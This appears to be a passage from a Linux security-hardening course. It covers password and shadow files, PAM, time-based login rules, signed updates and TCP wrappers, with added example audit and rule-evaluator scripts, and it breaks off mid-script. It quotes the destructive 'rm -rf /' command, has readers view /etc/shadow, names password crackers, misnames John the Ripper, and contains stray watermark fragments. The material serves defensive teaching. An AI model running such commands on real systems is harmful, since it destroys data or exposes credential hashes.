All user accounts in Linux require a password. However, there is no default method in place that prevents the password from being blank, often referred to as a null password. In order for an account to be authenticated by the system, the user name and password provided during the login session must match the information stored in the system. During the installation of Linux, the default method of handling passwords is to use Message Digest 5 (MD5) encryption. If you choose not to use MD5 during installation (which is not recommended), the system will default to Data Encryption Standard (DES) encryption for the passwords. DES limits passwords to eight alphanumeric characters (meaning no punctuation or special characters), which creates an encryption of only 56 bits. It is said "only" 56 bits, since modern computers can crack a 56-bit password very quickly, even if the method used is brute-force cracking.

Password File

The initial operation of UNIX in storing passwords was to have a single world-readable file that held all the passwords, in their encrypted form. Although this practice allowed the system and applications all to have a single point of access for quick authentication of user accounts, it created a security risk. Because the file is world-readable, all users have access to read the file. However, you do not want to alter this file so that it is no longer readable by everyone, because system functions and applications that are designed to use the file will no longer have access.

Because any user could read the file, the password hash was plainly visible; this was the root of the problem. A user could simply view the file and write down (or even copy to a floppy disk) the password hash. They could then take the hash home and run a password cracking utility on it. Password cracking tools like Crack and Jack The Ripper would make short work of this challenge, and the password would be revealed in a short time.

cracking: The act of breaking into a computer system.
Crack: A popular hacking tool used to decode encrypted passwords. System administrators also use Crack to assess weak passwords by novice users in order to enhance the security of the AIS.

The default location for the passwords is the /etc/passwd file. Because this file is world-readable, you can simply navigate to it and view the contents. In this file, the following line shows what a user's entry would look like:

Account_Name:Password:UID:GID:Full_Name:Directory:Program

Where:

Account_Name: This is the user account name used during login.
Password: This is the hash of the user's password. If the password is null, there will be no entry here, and the field will remain empty (::).
UID: This is the assigned User Identification of the user account.
GID: This is the assigned Group Identification of the user account.
Full_Name: This can be the user's full name, or other information, as desired.
Directory: This is the user account's home directory.
Program: This defines the shell (or other program) that will run when the user account is authenticated during the login process.

You saw this file earlier in this lesson, but here it is again for your reference.

Figure 3-16: An example /etc/passwd file on a Linux computer.

The Shadow Password File

If you accepted the default during installation, as it is highly recommended you do, then your passwords are not stored in the world-readable /etc/passwd file. They will instead be stored in a file called /etc/shadow.

In the event that shadow passwords are used, the previous entry in the /etc/passwd file will have a significant change. Instead of the password field showing the hash of the user's password, only a single X will be displayed. This is an indicator that shadow passwords are being used. No longer can any user learn the password hash of every other user (including root, by the way) by viewing the /etc/passwd file.

The /etc/shadow file is not readable by every user of the system; it is only readable by the root account. This feature alone increases the security of the entire system considerably.

The format of the /etc/shadow file is similar to the /etc/passwd file, but the fields are different. In this file, the following line shows what a user's entry would look like:

Account_Name:Password:Last:Min:Max:Warn:Expire:Disable:Reserved

Where:

Account_Name: This is the user account name used during login.
Password: This is the hash of the password.
Last: This is the number of days since January 1, 1970, that the password was last changed.
Min: This is the minimum number of days a user must wait before changing the password again.
Max: This is the maximum number of days before a user must change the password.
Warn: This is the number of days prior to password expiration that the user receives a warning.
Expire: This is the number of days after a password expires that the account becomes disabled.
Disable: This is the number of days since January 1, 1970, that the account has been disabled.
Reserved: This is a reserved field intended for future use.

UNIX was released to the world in 1970; therefore, January 1, 1970, is considered the starting date of the OS.

Figure 3-17: An example /etc/shadow file on a Linux computer.

In Figure 3-17, you can see that when the /etc/shadow file is used, the /etc/passwd file is still in use. This is the reason that the fields are different. The /etc/passwd file still contains the UID and GID information, for example. The /etc/shadow file is concerned only with information tied to the account accessing the system.

TASK 3B-5
Viewing the Password Files

Setup: You are logged on to Red Hat 8 as root.

1. Open a Terminal Window, navigate to the /etc directory, and cat the passwd file.
2. Read the entries in the file, and determine if the shadow file is in use on your system.
3. Cat the /etc/shadow file.
4. Observe the differences between the two files.
5. Close any open windows.

Managing Passwords

Even though the shadow password file has options for the ages of passwords, such as minimum age and maximum age, you should still manage these values to use what the security policy of your organization dictates. When the shadow password file is used, every new user account that is created refers to a configuration file called /etc/login.defs. This file contains the aging options, as well as the password length configuration. The default values in this file are as described in the following table.

Entry            Default Value   Description
PASS_MAX_DAYS    99999           Maximum number of days a user can go without changing his or her password.
PASS_MIN_DAYS    0               Minimum number of days a user must wait before changing the password again.
PASS_MIN_LEN     5               Minimum length of the password.
PASS_WARN_AGE    7               Number of days before expiration that the user is warned.

The MAX_DAYS entry defines the number of days a user can go without changing his or her password. The default of 99999 is approximately 274 years, which is most likely a bit longer than what most organizations will require! If your organization requires high levels of security, this value will likely be 30 days or fewer. For most organizations, three months, listed as 90 days, is an adequate time for this value. Conversely, the MIN_DAYS value has a default of 0, and in most situations will be left at 0. This allows a user to change his or her password at any time. The MIN_LEN entry defines the minimum length of the password. The default setting of 5 is acceptable, but increasing that value to at least 7 is recommended for higher security. Remember, a longer password (as long as the rules for strong passwords are followed: alphanumeric, special characters, punctuation, and so forth) is better than a shorter password. The WARN_AGE entry defines the number of days a user will be warned about an expiring password, prior to the actual expiration date.

Password aging can also be managed in Red Hat User Manager.

TASK 3B-6
Managing Passwords

Setup: You are logged on to Red Hat 8 as root.

1. Open a text editor, and open the /etc/login.defs file.
2. Change PASS_MAX_DAYS to 20, leave PASS_MIN_DAYS at 0, change PASS_MIN_LEN to 7, and leave PASS_WARN_AGE at 7.
3. Save the file and close the editor.
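The Password Security, Password File, Shadow Password File and Managing Passwords sections above each describe a condition an administrator would want to check for: a password hash still sitting in the world-readable passwd file instead of an x, a null password, a DES-style hash (chosen when MD5 was declined at installation; MD5 crypt hashes are recognisable by their $1$ prefix), and a Max field looser than the PASS_MAX_DAYS policy in /etc/login.defs. The script below is an added example, not part of the course, that runs those checks over constructed sample entries embedded inline (the hashes are obvious placeholders, not real hashes, and the account names are invented). The functions login_def, audit_passwd, audit_shadow and run_audit are constructed for this example; on a real system the same functions would read /etc/passwd, /etc/shadow and /etc/login.defs as root.

```shell
#!/bin/sh
# Added example (not from the course): audit constructed passwd, shadow
# and login.defs entries for the weaknesses described in the text.

# Constructed sample passwd entries: name:hash-or-x:UID:GID:name:home:shell
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
User1:x:500:500:User One:/home/User1:/bin/bash
legacy:abCDEFGHIJKLM:501:501:Old Box:/home/legacy:/bin/bash
guest:x:502:502:Guest:/home/guest:/bin/bash'

# Constructed sample shadow entries (placeholder hashes, not real ones):
# name:hash:last:min:max:warn:expire:disable:reserved
SAMPLE_SHADOW='root:$1$FAKESALT$FAKEHASHPLACEHOLDER0000:12000:0:99999:7:::
User1:$1$FAKESALT$FAKEHASHPLACEHOLDER0001:12000:0:90:7:::
legacy:abCDEFGHIJKLM:12000:0:99999:7:::
guest::12000:0:99999:7:::'

# Constructed login.defs body with the values chosen in Task 3B-6.
SAMPLE_LOGIN_DEFS='PASS_MAX_DAYS 20
PASS_MIN_DAYS 0
PASS_MIN_LEN 7
PASS_WARN_AGE 7'

# login_def CONTENT KEY: the value of KEY in a login.defs body.
login_def() {
    printf '%s\n' "$1" | awk -v k="$2" '$1 == k { print $2 }'
}

# audit_passwd CONTENT: names whose passwd entry still carries a hash;
# anything other than "x" in field 2 means shadow passwords are not in use.
audit_passwd() {
    printf '%s\n' "$1" | awk -F: '$2 != "x" { print $1 }'
}

# audit_shadow CONTENT MAXDAYS: one finding per line as "name:reason".
# A hash without the $1$ prefix is treated as the 56-bit DES form.
audit_shadow() {
    printf '%s\n' "$1" | awk -F: -v maxdays="$2" '
        $2 == ""                { print $1 ":null-password"; next }
        index($2, "$1$") != 1   { print $1 ":des-hash" }
        $5 + 0 > maxdays        { print $1 ":max-days-" $5 }
    '
}

# run_audit: all findings for the sample data, sorted, on one line.
run_audit() {
    max=$(login_def "$SAMPLE_LOGIN_DEFS" PASS_MAX_DAYS)
    {
        audit_passwd "$SAMPLE_PASSWD" | sed 's/$/:hash-in-passwd/'
        audit_shadow "$SAMPLE_SHADOW" "$max"
    } | LC_ALL=C sort | tr '\n' ' ' | sed 's/ $//'
}
```

With the sample data, the account "legacy" is reported three times (hash visible in passwd, DES hash, Max of 99999), "guest" for its null password, and root and User1 only because their Max exceeds the 20-day policy from Task 3B-6.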

Pluggable Authentication Modules (PAM)

As the UNIX and Linux operating systems evolved, the introduction of the shadow password file allowed for greater security in regard to passwords. However, as new and more advanced systems of authentication, such as Smart Cards, are introduced, this solution also has the potential to create problems. It would be very inefficient to recompile all applications to use each and every new form of authentication that is brought into the OS. For example, FTP would have to be made aware of a user authenticating by using a Smart Card, instead of by using the traditional user account name and password.

So, how do these programs know that a new authentication scheme is being used, such as the shadow password file instead of the traditional password file? The answer is Pluggable Authentication Modules (PAM). Applications only need to be PAM-aware, or compiled to know and use PAM for authentication purposes.

PAM enables the program designer to ignore the authentication method used. No longer does the designer need to worry about creating unique versions of an application for each authentication method, nor to recompile an application every time a new authentication scheme is introduced.

The directory that holds the modules is /etc/pam.d/. In this directory, there will be unique files that define the specific requirements for a program that is PAM-aware. Although these files are designed to function properly when installed, you might want to change them. If you do want to alter these configuration files, it is important to understand their structure.

PAM Configuration Files

These configuration files take advantage of the modular format of PAM to provide the authentication services for their applications. The files contain calls to these modules, which are usually located in the /lib/security directory. Each line in the configuration file defines a module type, a control flag, a path to the module, and module arguments (this is an optional component, not in every line).

One of the first things you might notice if you look into the details of the configuration files is that the names of the files are based on the services that an application requires, not the name of the application itself. In some instances, this is the same, such as the login application using the login service. However, you will also see differences, such as the wu-ftp application using the ftp service. This means that, in the /etc/pam.d/ directory, you will see a file for login and a file for ftp, but not a file for wu-ftp.

PAM Modules

There are four distinct PAM module types. Each type is relative to a specific part of the authentication process. The four types are:

auth: This module is used to authenticate the user. This can be done in a variety of ways, including requesting and verifying user name and password.
account: This module is used to verify that access is allowed. This can include checking the user account status, for expiration, or time-of-day restrictions.
password: This module is used to define passwords.
session: This module is used once a user has been authenticated, to manage the session. This might include refreshing session tokens.

Any one module has the ability to address more than one module type. A module may go so far as to have all four types. In the configuration file, the module type will be the first item that is detailed. The format of the lines in the configuration file is as follows:

Module-Type Control-Flag Module-Path Module-Arguments

An example of such a line is the following line, from the rlogin configuration file:

auth required /lib/security/pam_nologin.so

In this example, the module type is auth, the control flag is required, the module path is /lib/security/pam_nologin.so, and there are no arguments presented.

PAM Control Flags

You have seen the module types defined, and the path is self-explanatory at this stage. The remaining component of this line that requires discussion is the control flag. The control flag in this example is required. There are four possible control flags:

Required: This flag states that the module must be checked successfully for the authentication to be allowed. In the event that the module checks and the authentication fails, the user is not informed until all modules have been checked.
Requisite: This flag states that the module must be checked successfully for the authentication to be allowed. In the event the check fails, the user is informed immediately, with a message stating that the failure was Required or Requisite.
Sufficient: This flag states that if the user is successfully authenticated, and there have been no Required flag failures, the authentication process is considered complete, the user is authenticated, and no other modules are checked.
Optional: This flag is not used very often. If the module check is a success or a failure, then this flag has no role to play. It is only when no other modules have determined a success or a failure that this flag is used. In that case, the overall PAM authentication for the module type is used.

By combining the module types and the control flags, modules can be stacked to provide a very specific authentication package. The order of the stacked modules is significant, as the system executes the modules from the top down. Stacking these modules enables the administrator to define a group of conditions that must be met in order for authentication to be successful. The following example of stacked modules is the rlogin configuration file:

auth required   /lib/security/pam_nologin.so
auth required   /lib/security/pam_securetty.so
auth required   /lib/security/pam_env.so
auth sufficient /lib/security/pam_rhosts_auth.so
auth required   /lib/security/pam_stack.so service=system-auth

By reading this stack, you can determine the following details of the configuration file:

Line one: PAM will verify that the /etc/nologin file does not exist.
Line two: PAM will verify that the user is not trying to log in remotely as root, over an unencrypted network connection.
Line three: PAM will load any environment variables that are defined.
Line four: PAM will verify a successful rhosts authentication; if successful, the connection is allowed, and authentication is complete.
Line five: PAM will use standard user name and password authentication. (This line will be checked only if the previous line is not successful.)

Security with PAM

One way that PAM can be used to increase the security of the system is with the other configuration file. This file, found at /etc/pam.d/other, is what the system uses when it cannot find a configuration file for a specific application. The default configuration of this file is as follows:

auth     required /lib/security/pam_deny.so
account  required /lib/security/pam_deny.so
password required /lib/security/pam_deny.so
session  required /lib/security/pam_deny.so

This is the equivalent of stating that unless there is a configuration file that can grant access, deny everyone. The pam_deny.so module will always produce a failure, and because this configuration file includes pam_deny.so for all four types, a failure will always be the end result of checking this file.
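To make the control-flag rules and the top-down evaluation concrete, here is an added example (not from the course, and not a real PAM implementation) that simulates a stack. Each argument is FLAG:RESULT, where FLAG is one of the four control flags above and RESULT is pass or fail, listed in the same order as the lines of a /etc/pam.d file; the function prints the overall outcome and how many modules were consulted, so the difference between required (keeps going, reports at the end) and requisite (stops at once) is visible. The function name pam_eval and the FLAG:RESULT notation are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the course): simulate how PAM combines the
# results of stacked modules according to their control flags.

# pam_eval FLAG:RESULT ...   prints "PASS N" or "FAIL N", N = modules run.
pam_eval() {
    required_failed=0   # a required failure is final but not reported yet
    decided=""          # set once a required/requisite module has spoken
    optional_result=""  # consulted only if nothing else decided
    consulted=0
    for entry in "$@"; do
        flag=${entry%%:*}; result=${entry#*:}
        consulted=$((consulted + 1))
        case $flag in
            requisite)
                # Failure stops the stack immediately; the user is told now.
                if [ "$result" = fail ]; then echo "FAIL $consulted"; return 1; fi
                decided=pass;;
            required)
                # Failure is remembered; the remaining modules still run.
                if [ "$result" = fail ]; then required_failed=1; fi
                decided=pass;;
            sufficient)
                # Success ends the stack only if no required module failed.
                if [ "$result" = pass ] && [ "$required_failed" -eq 0 ]; then
                    echo "PASS $consulted"; return 0
                fi;;
            optional)
                optional_result=$result;;
            *) echo "unknown control flag: $flag" >&2; return 2;;
        esac
    done
    if [ "$required_failed" -eq 1 ]; then echo "FAIL $consulted"; return 1; fi
    if [ -n "$decided" ]; then echo "PASS $consulted"; return 0; fi
    # Only optional modules (or a failed sufficient one) were present.
    if [ "$optional_result" = pass ]; then echo "PASS $consulted"; return 0; fi
    echo "FAIL $consulted"; return 1
}

# rlogin_stack RHOSTS: the five-line rlogin stack above, with the first
# three required modules passing and pam_rhosts_auth given as pass|fail.
rlogin_stack() {
    pam_eval required:pass required:pass required:pass "sufficient:$1" required:pass
}
```

rlogin_stack pass stops after four modules, exactly as "Line four" above describes, while rlogin_stack fail falls through to the fifth line; a stack consisting only of required:fail, which is what the other file amounts to, fails no matter what follows it.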

The Red Hat Linux distribution includes many other PAM modules that have an effect on the security of the system. The following is just a partial listing of the modules available in the system, and a brief description of what and/or how they can be used: pam_accessThis checks for access information, such as account expiration. pam_denyThis denies all access.

pam_groupThis sets permissions based on /etc/group and other congurable options. pam_limitsThis sets limits on resources.

pam_lastlogThis displays information about the last user logged in. pam_nologinThis denies login based on /etc/nologin.

pam_permitThis always allows access (its the inverse of the pam_deny module). pam_securettyThis uses the authentication of /etc/securetty. pam_tallyThis tracks login attempts, and allows for locking of accounts after a dened number of failed attempts. pam_timeThis allows for time-based controls to applications and services. pam_wheelThis denes authentication based on the user account belonging to the wheel group.

Ed
T DU

pam_rhosts_authThis uses the authentication of /rlogin/rsh.

Securing Access with PAM

st

180

Hardening The Infrastructure (SCP)

In

DO

ru ct
The time of day.

One of the tasks you will likely want to perform is to control access to objects or to the system based on time. For example, your corporate security policy might state that users are not allowed to log in when the office is closed. You can implement this policy by using the module pam_time, found at /lib/security/pam_ time.so. This module can control access based on any of the following elements: The user account name. The day of the week.

or
NO

The service the user account is requesting to use. The terminal where the request originates.

PL

IC

AT

iti

on

pam_cracklibThis checks the strength of passwords.

ttysThis eld is the terminal that is to have time restrictions enforced. ttyp* will enforce the restrictions on all remote terminal connections, such as Telnet. tty* will enforce the restrictions on all console terminal connections.

Ed
T DU PL IC

Lesson 3: Hardening Linux Computers

The execution of the pam_time module is based on its associated configuration file. For time restrictions, the configuration file is /etc/security/time.conf. Each rule in this file is a single line of four fields separated by semicolons: services;ttys;users;times. The fields are:

services: This field names the service that is to have time restrictions enforced. A very common example is the login service. If the rule should cover multiple services, such as login and su, they are combined in this field as login&su.

ttys: This field names the terminal the user is on. When accessing your computer via the console, you are using tty*. When accessing remotely over a pseudo-terminal, you are using ttyp*.

users: This field defines the users affected by the time restrictions. If you want the restrictions to affect all users, put the * character in this field.

times: This field defines the actual times that are going to be restricted. Times are entered in 24-hour clock format, so 11:00 A.M. to 3:00 P.M. is 1100-1500. Day entries are also given in this field if the restrictions depend on the day of the week. Days are identified by their first two letters: Monday is Mo, Wednesday is We, and so on. To cover all days of the week, use Al; to cover only weekdays, use Wk; to cover only weekends, use Wd.

The fields are built with the help of four special characters: the exclamation point (!), the pipe symbol (|), the ampersand (&), and the asterisk (*).

The ! character means NOT. An example is !root, meaning not root, or everyone except root.

The | character means OR. An example is User1|User2, meaning User1 or User2.

The & character means AND. An example is User1&User2, meaning both User1 and User2.

The * character is a wildcard. An example is log*, meaning everything that starts with log. When used in the users field, * means all user accounts.

A rule takes effect for a login whose service, tty, and user all match its first three fields; such a login is then permitted only while the times field matches. A times entry prefixed with ! therefore names the hours during which access is blocked.

By combining these characters and options, you can create a line in the /etc/security/time.conf file that restricts access according to your policy. The following example shows a line that restricts access. No user other than User1 is allowed to log in to the system (by either remote or console access) between the hours of 9:00 P.M. and 5:00 A.M., every day of the week. The users field !User1 reads "everyone except User1":

login;tty*;!User1;!Al2100-0500

The second example is similar to the first. However, in this example users are restricted from using a remote terminal connection, but they are allowed to use a console connection to gain access to the system. The same user and hour restrictions are in place.

login;ttyp*;!User1;!Al2100-0500

In this final example, all users except root are denied access to console login at all times.

login;tty*&!ttyp*;!root;!Al0000-2400
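To see the four fields and the four operators evaluated together, here is a small evaluator for time.conf rules. It is an added example written for this edition, not code from the course book or from Linux-PAM. It assumes that & binds tighter than |, that a time range ending before it starts (2100-0500) wraps past midnight, and it uses the plain !User1 form for "everyone except User1". The sample rules and timestamps are constructed.

```python
"""Evaluate pam_time rules from an /etc/security/time.conf-style file.

Added example; this is not code from the course book or from Linux-PAM.
It implements the four-field syntax services;ttys;users;times with the
! (not), | (or), & (and) and * (wildcard) operators. As in the pam_time
manual, a rule applies when its service, tty and user fields all match
the login, and the login is then permitted only while the times field
matches, so a times field such as !Al2100-0500 blocks those hours.
Assumption: & binds tighter than |, and a range that ends before it
starts (2100-0500) wraps past midnight.
"""
import fnmatch
from datetime import datetime

DAYS = {"Mo": {0}, "Tu": {1}, "We": {2}, "Th": {3}, "Fr": {4}, "Sa": {5},
        "Su": {6}, "Wk": {0, 1, 2, 3, 4}, "Wd": {5, 6}, "Al": set(range(7))}

# Constructed sample rules: the two policies described in the text.
SAMPLE_RULES = """
# only User1 may log in, on any terminal, between 21:00 and 05:00
login;tty*;!User1;!Al2100-0500
# everyone except root is denied console login at all times
login;tty*&!ttyp*;!root;!Al0000-2400
"""
SAMPLE_NIGHT = datetime(2003, 6, 4, 23, 30)   # Wednesday 23:30 (constructed)
SAMPLE_DAY = datetime(2003, 6, 4, 10, 0)      # Wednesday 10:00 (constructed)


def _term(term, match_one):
    """One term of a logic list; a leading ! negates it."""
    term = term.strip()
    if term.startswith("!"):
        return not match_one(term[1:])
    return match_one(term)


def _logic(field, match_one):
    """Logic list: terms joined by & inside alternatives joined by |."""
    return any(all(_term(t, match_one) for t in alt.split("&"))
               for alt in field.split("|"))


def _time_term(term, when):
    """A times term such as Wk0900-1700: two-letter day code plus HHMM-HHMM."""
    days, span = DAYS[term[:2]], term[2:]
    start, end = (int(x) for x in span.split("-"))
    now = when.hour * 100 + when.minute
    if start <= end:
        return when.weekday() in days and start <= now < end
    # wraps midnight: after 00:00 the rule's day is the previous calendar day
    day = when.weekday() if now >= start else (when.weekday() - 1) % 7
    return day in days and (now >= start or now < end)


def parse_rules(text):
    """Return [(services, ttys, users, times), ...], skipping comments."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            rules.append(tuple(f.strip() for f in line.split(";")))
    return rules


def login_allowed(rules, service, tty, user, when):
    """False if any rule matching service/tty/user is outside its times."""
    for services, ttys, users, times in rules:
        if (_logic(services, lambda p: fnmatch.fnmatchcase(service, p))
                and _logic(ttys, lambda p: fnmatch.fnmatchcase(tty, p))
                and _logic(users, lambda p: fnmatch.fnmatchcase(user, p))):
            if not _logic(times, lambda t: _time_term(t, when)):
                return False
    return True


if __name__ == "__main__":
    rules = parse_rules(SAMPLE_RULES)
    for tty, user, when in (("ttyp1", "User1", SAMPLE_NIGHT),
                            ("ttyp1", "bob", SAMPLE_NIGHT),
                            ("tty1", "root", SAMPLE_DAY),
                            ("tty1", "bob", SAMPLE_DAY)):
        verdict = "allowed" if login_allowed(rules, "login", tty, user, when) else "denied"
        print(tty, user, when.strftime("%a %H:%M"), verdict)
```

Running the script shows the effect of both rules at once: bob is refused on a pseudo-terminal at 23:30 and on the console at any hour, while User1 gets in at night and root keeps the console.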

Security Updates

It is a given that in the security world holes will be found in applications, and that other security risks are going to be discovered. The world of security is dynamic, and it can be very difficult for an administrator to keep up to date with all of the newest exploits and attacks against systems. The Red Hat distribution of Linux is, unfortunately, no exception. Red Hat, Inc., has stated its commitment to releasing updates that fix the holes as quickly as possible. Once a patch has been tested and is ready for release, it is distributed to the public as an official Red Hat errata update. Whenever you download an update, verify its signature against the vendor's key before installing it. It is common for an attacker to offer a Trojan version of an update that introduces a new security hole. There are two methods for obtaining security updates: through the Red Hat Network, and through the official errata.

The Red Hat Network

The Red Hat Network provides an automated updating process. The service can check your system, determine the needed updates, download them, verify the signature of each update, and even perform the install automatically. If you do not want updates to install automatically, you can schedule the installs for a time you determine. For the Red Hat Network update system to work, each computer that you want updated has to register a system profile. The system profile identifies the computer by its software and hardware information, and that information is kept confidential. When the Red Hat Network determines that your system needs an update, you can be notified by email. The update is applied with a program called Red Hat Update Agent. More information about this process can be found at http://rhn.redhat.com.

Security Errata

Red Hat issues security errata reports, as they are published, on the Red Hat Linux Errata Web site, www.redhat.com/apps/support/errata. Here you can select a product and display the security updates that are unique to that product, which saves you the time of sorting through all the updates to find the ones relevant to you. All official Red Hat Security Errata updates are signed with the Red Hat, Inc., GPG key. Red Hat 8.0 automatically attempts to verify the GPG signature before installing an RPM. If you do not have the key installed, it can be found on the Red Hat CD-ROM. The key is imported into the RPM keyring with the following command:

rpm --import /mnt/cdrom/RPM-GPG-KEY

Once it is installed, you will want to verify the key. To display all keys installed for RPM verification, use the following command:

rpm -qa gpg-pubkey*

For the Red Hat, Inc., key, you should see the following output:

gpg-pubkey-db42a60e-37ea5438

Once you have verified the GPG signature of an update, you can be sure that its contents are official and have not been modified. That assurance is only as good as the key itself, which is why it should be imported from trusted installation media rather than downloaded from the same place as the update.

attack: An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.

Topic 3C
Access Control

In Linux, configuring access control can be accomplished by using TCP wrappers and the xinetd superdaemon. To start, let's look at TCP wrappers.

TCP Wrappers

Firewalls and other perimeter protection schemes provide an excellent means of protecting the entire network from attacks. There will be times, however, when you want more granular control, and want to control access to and from individual services on a single computer. Linux provides the ability to do this on the machine itself, enabling you to create an additional layer of security at the source of the service. This ability is provided by TCP wrappers and the xinetd daemon. The history beh

ind the TCP wrappers program is worth noting.

The year was 1990, and the location was Eindhoven University of Technology in Eindhoven, Netherlands. The University was under heavy attack from a Dutch hacker who had obtained root-level access. This hacker opened a lot of eyes to the destructiveness of intruders with the simple command rm -rf /, which recursively deletes every file on the system; the damage is comparable to reformatting the disk. The University employed Wietse Venema in the Mathematics and Computer Science Department. In response to these attacks, he developed a program that could control host access and track and log intruders. This program is what we now know as TCP wrappers.

TCP wrappers work by providing a checkpoint between a request for a service and the service itself. This checkpoint, the TCP wrapper daemon (tcpd), answers requests for network services on behalf of the service. The daemon then consults its configuration files and performs security checks before it allows the request to be handed to the service. This provides two functional advantages over traditional service-controlling systems:

The TCP wrappers operate separately from the service or application that the wrappers are protecting. Applications and services therefore do not need to be rewritten, and they can share common configuration files for management.

The connecting client does not know that TCP wrappers are in operation. No message is ever sent back to the remote client reporting success or failure; a refused connection is simply closed.

hacker: A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.

TCP wrapper: A software tool for security which provides additional network logging, and restricts service access to authorized hosts by service.

TCP Wrappers Configuration Files

Two configuration files are used by TCP wrappers to provide host-based access control: /etc/hosts.allow and /etc/hosts.deny. The default behavior, if there are no rules in either file, is to grant everyone access to the services. In other words, you need to create some rules if you want control. The rules in these two files must be created in a careful order. The system reads each file from the top down, and reads the rules in the allow file before reading the rules in the deny file; the first matching rule decides. Therefore, a specific denial rule for a host in the deny file will never be reached if that same host is granted access in the allow file.

The default behavior of the access control of TCP wrappers is to grant access. There must be a rule to deny all in hosts.deny, if that is the behavior you want.

host based: Information, such as audit data from a single host which may be used to detect intrusions.

Configuring TCP Wrappers

The rules in the configuration files are single-line entries. Any line that is blank or that starts with the comment character (#) is ignored. The rules have the following fields:

<daemon_list>: <client_list>[: spawn <shell_command> ]

Where:

daemon_list defines the process(es) or wildcard(s), each separated by whitespace, to match against the requested service.

client_list defines the hostname(s), IP address(es), pattern(s), or wildcard(s), each separated by whitespace, to match against the client when a process name in daemon_list matches the requested service.

shell_command defines an optional command to be executed when the rule matches.

The description of client_list mentions patterns. Patterns are useful for grouping clients together. The common method for grouping clients is to use the decimal point (.). By using the decimal point you can identify groups of hosts, either by domain name or by IP address. Placing the decimal point at the leading edge of a string includes all hosts whose names end with that string. So the following two hosts would be grouped together if the client_list were .securitycertified.net:

scnp.securitycertified.net
scna.securitycertified.net

Likewise, the decimal point can be used with IP addresses. If you have a client_list of 192.168., then all IP addresses that begin with 192.168. will be grouped together.

Wildcards can also be used in the creation of access rules. There are five wildcards that you can use:

ALL: This wildcard matches every client with a given service (or every service with a client).

LOCAL: This wildcard matches any host whose name does not contain a decimal point character (.).

KNOWN: This wildcard matches any host where the hostname and the address are known, or where the user is known.

UNKNOWN: This wildcard matches any host where the hostname or the address is unknown, or where the user is unknown.

PARANOID: This wildcard matches any host where the hostname does not match the host address.

In addition to these wildcards, there is another keyword that can be used in these lines: EXCEPT. Its use is logical, as you would anticipate. For example, if you want to match every host from the 192.168.10.0 network (written with the trailing-dot pattern), but not the single host 192.168.10.5, the rule would be:

ALL: 192.168.10. EXCEPT 192.168.10.5

Take a look at the following sample lines. Remember that lines starting with the # character are comment lines, so they will be ignored.

# all hosts in the local network
ALL: LOCAL
# all hosts in securitycertified.net, except insecure.securitycertified.net
ALL: .securitycertified.net EXCEPT insecure.securitycertified.net
# all hosts in the 172.16.23.0 network
ALL: 172.16.23.
# all local hosts access to the ftp service
in.ftpd: LOCAL
# all local hosts access to all services, except for the ftp service
ALL EXCEPT in.ftpd: LOCAL
# single host 10.20.23.45 access to the telnet service
in.telnetd: 10.20.23.45

Looking at these lines, you might wonder whether they grant access or deny access. In reality, they can do either. The deciding factor is not the line itself but its location. As mentioned earlier, there are two configuration files, /etc/hosts.allow and /etc/hosts.deny. By placing a line in one file or the other, you decide whether it grants or denies access.

The following configuration examples show different levels of security on the network. This first example grants access to all local hosts, to all hosts in the securitycertified.net domain except hacker1.securitycertified.net, and to all hosts in the 10.20.23.0 network except 10.20.23.45. For the denial, the hosts.deny configuration specifically denies all other hosts.

/etc/hosts.allow
ALL: LOCAL
ALL: .securitycertified.net EXCEPT hacker1.securitycertified.net
ALL: 10.20.23. EXCEPT 10.20.23.45

/etc/hosts.deny
ALL: ALL

The next example is very restrictive, allowing only a few hosts to have access. In addition, access varies by service on the machine.

/etc/hosts.allow
ALL: 172.168.10.54
in.ftpd: 172.168.10.42
in.telnetd: 172.168.10.42

/etc/hosts.deny
ALL: ALL

Finally, this third example is also quite restrictive. In this case, the only allowed service is an internal ftp server.

/etc/hosts.allow
in.ftpd: LOCAL

/etc/hosts.deny
ALL: ALL

The last option that we need to mention was listed in the full rule: shell_command. It is very often used for what are known as booby traps. Remember, the rule line is service(s):client(s):shell_command. Shell commands use expansions (sometimes called variables) in their execution. The expansions apply to all shell commands, and include those listed in the following table.

Expansion   Description
%a          Client IP address.
%A          Server IP address.
%c          Client information, including user name and hostname, or user name and IP address.
%d          Daemon process name.
%h          Client hostname. If unavailable, the IP address is used.
%H          Server hostname. If unavailable, the IP address is used.
%u          Client user name. If unavailable, unknown is listed.

Here is an example booby trap line from the hosts.deny file. This line writes a log line that contains client information when a host in the 192.168.23.0/24 network attempts to use Telnet:

in.telnetd: 192.168.23.: spawn (/bin/echo %c >> /var/log/telnet.log)

The expanded values come from data the remote side supplies (its hostname and ident user name), so tcpd replaces characters that are special to the shell with underscores before running the command. The command still runs once for every matching connection, so keep it cheap.
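The following evaluator, an added example that is not part of the course book or of the tcp_wrappers package, reproduces the decision order described in this section for the sample files and the booby trap above: the allow file first, then the deny file, first match wins, and an unmatched connection is allowed. It handles the five wildcards, EXCEPT, leading-dot and trailing-dot patterns and net/mask pairs, and it expands the % sequences of a spawn command into text instead of running it. The sample files and connection records are constructed; a connection record assumes the hostname has already been looked up (None when the lookup failed) and that an ident user name may be present.

```python
"""Decide a connection the way tcpd does, from hosts.allow and hosts.deny.

Added example; this is not code from the course book or from the
tcp_wrappers package. It applies the decision order described above
(hosts.allow first, then hosts.deny, first match wins, default allow)
with the client_list patterns ALL, LOCAL, KNOWN, UNKNOWN, PARANOID,
EXCEPT, leading-dot domain suffixes, trailing-dot address prefixes and
net/mask pairs, and expands the % sequences of a spawn booby trap.
The spawned command is returned as text, never executed.
"""
import ipaddress

# Constructed sample files: the third configuration example above plus
# the Telnet booby trap in hosts.deny.
SAMPLE_ALLOW = "in.ftpd: LOCAL\n"
SAMPLE_DENY = """
in.telnetd: 192.168.23.: spawn (/bin/echo %c >> /var/log/telnet.log)
ALL: ALL
"""
# Constructed connections; host is None when the reverse lookup failed.
LAN_FTP = {"daemon": "in.ftpd", "host": "scnp", "addr": "10.0.0.5",
           "server_addr": "10.0.0.1"}
REMOTE_TELNET = {"daemon": "in.telnetd", "host": "pc7.example.net",
                 "addr": "192.168.23.7", "server_addr": "10.0.0.1",
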